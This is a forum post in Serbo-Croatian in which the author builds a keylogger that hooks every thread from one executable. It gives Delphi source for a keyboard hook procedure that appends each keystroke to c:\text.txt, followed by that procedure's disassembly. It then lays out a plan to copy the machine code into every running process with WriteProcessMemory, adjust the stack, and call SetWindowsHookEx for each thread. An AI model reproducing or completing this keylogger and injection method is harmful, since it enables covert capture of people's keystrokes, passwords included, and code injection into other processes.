Danas cu da naparavim pa cu tu pasteat kod.. pokusavam napravit keylogger za sve thredove koji rade u sistemu, a da taj keylogger ima samo jedan .exe, znaci ne i dll.. zato moram strpat u svaki proces KeyboardProc i onda za za svaki proces pozvat SetWindowHookEx.. mada cuo sam da on dosta trosi performanse sistema, uglavnom ovo je plan, KeyboardProc izgleda ovako:
Code:
Procedure _KeyboardProc(nCode: Integer; wParam: WPARAM;
lParam: LPARAM); stdcall;
var
LogFile : THandle;
BytesWritten : DWORD;
Ch : Byte;
begin
if ((HiWord(lParam) and KF_UP) <> 0) and
(nCode = HC_ACTION) then
begin
LogFile := CreateFile('c:\text.txt', GENERIC_WRITE,
FILE_SHARE_READ, Nil,
OPEN_ALWAYS, 0, 0);
SetFilePointer(LogFile, 0, Nil, FILE_END);
WriteFile (LogFile, wParam, 1, BytesWritten, Nil);
if Lo(wParam) = 13 then
begin
Ch := 10;
WriteFile (LogFile, Ch, 1, BytesWritten, Nil);
end;
CloseHandle(LogFile);
end;
CallNextHookEx(0, nCode, wParam, lParam);
end;
Disamblovana procedura izgleda ovako:
Code:
00451FDC /$ 55 PUSH EBP
00451FDD |. 8BEC MOV EBP,ESP
00451FDF |. 83C4 F8 ADD ESP,-8
00451FE2 |. 53 PUSH EBX
00451FE3 |. 56 PUSH ESI
00451FE4 |. 57 PUSH EDI
00451FE5 |. 8B5D 10 MOV EBX,DWORD PTR SS:[EBP+10]
00451FE8 |. 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]
00451FEB |. 8BC3 MOV EAX,EBX
00451FED |. C1E8 10 SHR EAX,10
00451FF0 |. F6C4 80 TEST AH,80
00451FF3 |. 74 67 JE SHORT Project1.0045205C
00451FF5 |. 85F6 TEST ESI,ESI
00451FF7 |. 75 63 JNZ SHORT Project1.0045205C
00451FF9 |. 6A 00 PUSH 0 ; /hTemplateFile = NULL
00451FFB |. 6A 00 PUSH 0 ; |Attributes = 0
00451FFD |. 6A 04 PUSH 4 ; |Mode = OPEN_ALWAYS
00451FFF |. 6A 00 PUSH 0 ; |pSecurity = NULL
00452001 |. 6A 01 PUSH 1 ; |ShareMode = FILE_SHARE_READ
00452003 |. 68 00000040 PUSH 40000000 ; |Access = GENERIC_WRITE
00452008 |. 68 74204500 PUSH Project1.00452074 ; |FileName = "c:\text.txt"
0045200D |. E8 963EFBFF CALL <JMP.&kernel32.CreateFileA> ; \CreateFileA
00452012 |. 8BF8 MOV EDI,EAX
00452014 |. 6A 02 PUSH 2 ; /Origin = FILE_END
00452016 |. 6A 00 PUSH 0 ; |pOffsetHi = NULL
00452018 |. 6A 00 PUSH 0 ; |OffsetLo = 0
0045201A |. 57 PUSH EDI ; |hFile
0045201B |. E8 0040FBFF CALL <JMP.&kernel32.SetFilePointer> ; \SetFilePointer
00452020 |. 6A 00 PUSH 0 ; /pOverlapped = NULL
00452022 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] ; |
00452025 |. 50 PUSH EAX ; |pBytesWritten
00452026 |. 6A 01 PUSH 1 ; |nBytesToWrite = 1
00452028 |. 8D45 0C LEA EAX,DWORD PTR SS:[EBP+C] ; |
0045202B |. 50 PUSH EAX ; |Buffer
0045202C |. 57 PUSH EDI ; |hFile
0045202D |. E8 1E40FBFF CALL <JMP.&kernel32.WriteFile> ; \WriteFile
00452032 |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
00452035 |. 25 FF000000 AND EAX,0FF
0045203A |. 66:83F8 0D CMP AX,0D
0045203E |. 75 16 JNZ SHORT Project1.00452056
00452040 |. C645 FB 0A MOV BYTE PTR SS:[EBP-5],0A
00452044 |. 6A 00 PUSH 0 ; /pOverlapped = NULL
00452046 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] ; |
00452049 |. 50 PUSH EAX ; |pBytesWritten
0045204A |. 6A 01 PUSH 1 ; |nBytesToWrite = 1
0045204C |. 8D45 FB LEA EAX,DWORD PTR SS:[EBP-5] ; |
0045204F |. 50 PUSH EAX ; |Buffer
00452050 |. 57 PUSH EDI ; |hFile
00452051 |. E8 FA3FFBFF CALL <JMP.&kernel32.WriteFile> ; \WriteFile
00452056 |> 57 PUSH EDI ; /hObject
00452057 |. E8 343EFBFF CALL <JMP.&kernel32.CloseHandle> ; \CloseHandle
0045205C |> 53 PUSH EBX ; /lParam
0045205D |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C] ; |
00452060 |. 50 PUSH EAX ; |wParam
00452061 |. 56 PUSH ESI ; |HookCode
00452062 |. 6A 00 PUSH 0 ; |hHook = NULL
00452064 |. E8 DF41FBFF CALL <JMP.&user32.CallNextHookEx> ; \CallNextHookEx
00452069 |. 5F POP EDI
0045206A |. 5E POP ESI
0045206B |. 5B POP EBX
0045206C |. 59 POP ECX
0045206D |. 59 POP ECX
0045206E |. 5D POP EBP
0045206F \. C2 0C00 RETN 0C
Sad moram da povadim masinski kod te procedure (to su oni bajtovi $55, $8B, $EC...) te onda u svaki proces da nadjem slobodno mjesto u memoriji i da onda sav taj masinski kod upisem u taj proces sa WriteProcessMemory!! To je lako samo je problem sto svakom procesu stack izgleda drukcije, tako da cu prvo morat stack da izmjenim!!
To ce rezultirat da svaki thread koji radi ima u sebi ugradjen _KeyboardProc i onda samo ostaje za svaki proces pozvat SetWindowsHookEx(WH_KEYBOARD,@adresa_keyboard_proca,0,pi.dwThreadId);
I to je to.. prvo moram da stack sredim da bude "isti" kod svih, tj. da prije poziva ovakvih komandi:
MOV EBX,DWORD PTR SS:[EBP+10], postavim na EBP+10 ono sto treba da bude..
poz
ps:
sa GetAsyncKeyState mogu da hvatam samo tastere, sa SetWindowHook mogu i tastere i misa i 1000 drugih stvari :)
Nece to bit keylogger vec me to neki dan s cimalo pa me sad zanima dal cu uspjet to da uradim (iz jednog .exe-a)